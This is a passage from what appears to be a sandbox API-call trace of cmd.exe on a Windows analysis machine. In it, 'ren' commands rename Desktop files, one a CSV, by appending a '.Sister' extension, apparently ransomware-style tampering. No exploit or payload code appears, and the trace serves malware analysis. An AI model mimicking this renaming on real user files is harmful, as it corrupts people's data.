lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x34) returned 1 [0200.589] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0200.589] _get_osfhandle (_FileHandle=1) returned 0x50 [0200.589] GetFileType (hFile=0x50) returned 0x2 [0200.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0200.589] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0200.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0200.713] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0200.788] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0200.865] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0200.877] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0200.878] malloc (_Size=0xffce) returned 0x21ed923fd00 [0200.878] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0200.878] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0200.878] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0200.878] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0200.878] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0200.878] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0200.878] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0200.878] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0200.878] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0200.878] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0200.878] ??_V@YAXPEAX@Z () returned 0x1 [0200.878] GetProcessHeap () returned 0x21ed8c70000 [0200.878] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8d6cae0 [0200.878] GetProcessHeap () returned 0x21ed8c70000 [0200.878] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6cae0, Size=0x78) returned 0x21ed8d6cae0 [0200.878] GetProcessHeap () returned 0x21ed8c70000 [0200.878] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6cae0) returned 0x78 [0200.878] GetProcessHeap () returned 0x21ed8c70000 [0200.878] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9378e80 [0200.879] GetProcessHeap () returned 0x21ed8c70000 [0200.879] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8d6cb70 [0200.879] GetProcessHeap () returned 0x21ed8c70000 [0200.879] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6cb70, Size=0x78) returned 0x21ed8d6cb70 [0200.879] GetProcessHeap () returned 0x21ed8c70000 [0200.879] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6cb70) returned 0x78 [0200.879] malloc (_Size=0xffce) returned 0x21ed923fd00 [0200.879] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0200.879] GetProcessHeap () returned 0x21ed8c70000 [0200.879] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14700 [0200.879] GetProcessHeap () returned 0x21ed8c70000 [0200.879] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955a5d0 [0200.879] _wcsicmp (_String1="yLW8a6BSku30pNN.csv", _String2=".") returned 75 [0200.879] _wcsicmp (_String1="yLW8a6BSku30pNN.csv", _String2="..") returned 75 [0200.879] GetFileAttributesW (lpFileName="yLW8a6BSku30pNN.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv")) returned 0x20 [0200.880] GetProcessHeap () returned 0x21ed8c70000 [0200.880] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a35520 [0200.882] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a35530 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0200.882] SetErrorMode (uMode=0x0) returned 0x0 [0200.882] SetErrorMode (uMode=0x1) returned 0x0 [0200.882] GetFullPathNameW (in: lpFileName="yLW8a6BSku30pNN.csv", nBufferLength=0x7fe7, lpBuffer=0x21ed923fd00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv", lpFilePart=0xa6cf4fd660*="yLW8a6BSku30pNN.csv") returned 0x2b [0200.882] SetErrorMode (uMode=0x0) returned 0x1 [0200.882] GetProcessHeap () returned 0x21ed8c70000 [0200.882] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9576510 [0200.883] _wcsicmp (_String1="yLW8a6BSku30pNN.csv", _String2=".") returned 75 [0200.883] _wcsicmp (_String1="yLW8a6BSku30pNN.csv", _String2="..") returned 75 [0200.883] GetFileAttributesW (lpFileName="yLW8a6BSku30pNN.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv")) returned 0x20 [0200.883] ??_V@YAXPEAX@Z () returned 0x1 [0200.883] malloc (_Size=0xffce) returned 0x21ed923fd00 [0200.883] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0200.883] malloc (_Size=0xffce) returned 0x21ed924fce0 [0200.883] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0200.883] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv")) returned 0x20 [0200.883] malloc (_Size=0xffce) returned 0x21ed973fd00 [0200.883] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0200.883] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv", fInfoLevelId=0x1, lpFindFileData=0x21ed955a5e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed955a5e0) returned 0x21ed9a14fa0 [0200.884] malloc (_Size=0xffce) returned 0x21ed974fce0 [0200.884] ??_V@YAXPEAX@Z () returned 0x21ed974fce0 [0200.884] ??_V@YAXPEAX@Z () returned 0x1 [0200.884] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0200.926] FindNextFileW (in: hFindFile=0x21ed9a14fa0, lpFindFileData=0x21ed955a5e0 | out: lpFindFileData=0x21ed955a5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff840b0, ftCreationTime.dwHighDateTime=0x1d5ef44, ftLastAccessTime.dwLowDateTime=0x7ae7f5f0, ftLastAccessTime.dwHighDateTime=0x1d5e0cc, ftLastWriteTime.dwLowDateTime=0x7ae7f5f0, ftLastWriteTime.dwHighDateTime=0x1d5e0cc, nFileSizeHigh=0x0, nFileSizeLow=0xcb3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="yLW8a6BSku30pNN.csv", cAlternateFileName="")) returned 0 [0200.927] GetLastError () returned 0x12 [0200.927] FindClose (in: hFindFile=0x21ed9a14fa0 | out: hFindFile=0x21ed9a14fa0) returned 1 [0200.927] ??_V@YAXPEAX@Z () returned 0x1 [0200.927] ??_V@YAXPEAX@Z () returned 0x1 [0200.927] ??_V@YAXPEAX@Z () returned 0x1 [0200.928] ??_V@YAXPEAX@Z () returned 0x1 [0200.930] GetProcessHeap () returned 0x21ed8c70000 [0200.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14940 [0200.930] GetProcessHeap () returned 0x21ed8c70000 [0200.930] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ae0, Size=0x16) returned 0x21ed8c95560 [0200.930] GetProcessHeap () returned 0x21ed8c70000 [0200.930] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95560) returned 0x16 [0200.930] GetProcessHeap () returned 0x21ed8c70000 [0200.930] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0200.930] GetProcessHeap () returned 0x21ed8c70000 [0200.930] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0200.930] GetProcessHeap () returned 0x21ed8c70000 [0200.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6dbd0 [0200.931] GetProcessHeap () returned 0x21ed8c70000 [0200.931] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6dbd0, Size=0xb2) returned 0x21ed8d6dbd0 [0200.931] GetProcessHeap () returned 0x21ed8c70000 [0200.931] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6dbd0) returned 0xb2 [0200.931] GetProcessHeap () returned 0x21ed8c70000 [0200.931] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9a45510 [0200.931] GetProcessHeap () returned 0x21ed8c70000 [0200.931] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a45510, Size=0x30) returned 0x21ed9a45510 [0200.931] GetProcessHeap () returned 0x21ed8c70000 [0200.931] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a45510) returned 0x30 [0200.931] GetProcessHeap () returned 0x21ed8c70000 [0200.931] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9a45550 [0200.931] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0200.935] GetProcessHeap () returned 0x21ed8c70000 [0200.935] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9571700 [0200.935] GetProcessHeap () returned 0x21ed8c70000 [0200.935] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed95729c0 [0200.935] ??_V@YAXPEAX@Z () returned 0x1 [0200.935] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0200.935] GetProcessHeap () returned 0x21ed8c70000 [0200.935] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9571340 [0200.935] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed923fd00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0200.935] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6cbc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a141c0 [0200.935] FindClose (in: hFindFile=0x21ed9a141c0 | out: hFindFile=0x21ed9a141c0) returned 1 [0200.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6cbc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14e20 [0200.936] FindClose (in: hFindFile=0x21ed9a14e20 | out: hFindFile=0x21ed9a14e20) returned 1 [0200.936] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa258725c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa258725c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6cbc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14760 [0200.936] FindClose (in: hFindFile=0x21ed9a14760 | out: hFindFile=0x21ed9a14760) returned 1 [0200.936] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa258725c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa258725c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6cbc0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0200.936] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0200.938] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0200.939] GetProcessHeap () returned 0x21ed8c70000 [0200.939] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67330 [0200.939] ??_V@YAXPEAX@Z () returned 0x1 [0200.939] ??_V@YAXPEAX@Z () returned 0x1 [0200.939] GetProcessHeap () returned 0x21ed8c70000 [0200.939] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a45550, Size=0x490) returned 0x21ed9a45550 [0200.939] GetProcessHeap () returned 0x21ed8c70000 [0200.939] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a45550) returned 0x490 [0200.939] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0200.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0200.939] GetFileType (hFile=0x50) returned 0x2 [0200.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0200.939] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0200.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.013] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0201.223] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0201.223] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0201.224] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0201.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.224] GetFileType (hFile=0x50) returned 0x2 [0201.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0201.224] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0201.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.348] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0201.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.495] GetFileType (hFile=0x50) returned 0x2 [0201.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0201.495] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0201.589] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.589] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9a45520*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9a45520*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0201.708] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0201.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.708] GetFileType (hFile=0x50) returned 0x2 [0201.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0201.708] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0201.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0201.807] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0202.209] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0202.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.209] GetFileType (hFile=0x50) returned 0x2 [0202.209] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.209] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.321] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0202.445] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.501] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.501] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.502] malloc (_Size=0xffce) returned 0x21ed923fd00 [0202.502] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0202.502] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.502] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.502] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.502] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.502] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.502] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.503] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.503] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.503] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.503] ??_V@YAXPEAX@Z () returned 0x1 [0202.503] GetProcessHeap () returned 0x21ed8c70000 [0202.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6dca0 [0202.503] GetProcessHeap () returned 0x21ed8c70000 [0202.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6dca0, Size=0x130) returned 0x21ed8d6dca0 [0202.503] GetProcessHeap () returned 0x21ed8c70000 [0202.503] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6dca0) returned 0x130 [0202.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.503] malloc (_Size=0xffce) returned 0x21ed923fd00 [0202.503] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0202.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.503] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed923fd00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.504] ??_V@YAXPEAX@Z () returned 0x1 [0202.504] GetProcessHeap () returned 0x21ed8c70000 [0202.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6ab70 [0202.505] GetProcessHeap () returned 0x21ed8c70000 [0202.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6d070 [0202.505] GetProcessHeap () returned 0x21ed8c70000 [0202.505] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d070, Size=0x130) returned 0x21ed8d6d070 [0202.505] GetProcessHeap () returned 0x21ed8c70000 [0202.505] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d070) returned 0x130 [0202.505] malloc (_Size=0xffce) returned 0x21ed923fd00 [0202.505] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0202.505] GetProcessHeap () returned 0x21ed8c70000 [0202.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14580 [0202.505] GetProcessHeap () returned 0x21ed8c70000 [0202.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9574f20 [0202.505] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.505] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.505] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.505] GetLastError () returned 0x2 [0202.505] GetProcessHeap () returned 0x21ed8c70000 [0202.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a459f0 [0202.505] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a45a00 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.506] SetErrorMode (uMode=0x0) returned 0x0 [0202.506] SetErrorMode (uMode=0x1) returned 0x0 [0202.506] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed923fd00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0202.506] SetErrorMode (uMode=0x0) returned 0x1 [0202.506] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0202.506] GetProcessHeap () returned 0x21ed8c70000 [0202.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed95742f0 [0202.506] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.506] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.506] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.506] GetLastError () returned 0x2 [0202.506] ??_V@YAXPEAX@Z () returned 0x1 [0202.506] malloc (_Size=0xffce) returned 0x21ed923fd00 [0202.506] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0202.506] malloc (_Size=0xffce) returned 0x21ed924fce0 [0202.506] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0202.507] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.510] GetLastError () returned 0x2 [0202.510] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.510] GetFileType (hFile=0x54) returned 0x2 [0202.510] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0202.511] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0202.529] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0202.529] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.529] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.529] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0202.535] longjmp () [0202.535] ??_V@YAXPEAX@Z () returned 0x1 [0202.535] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, 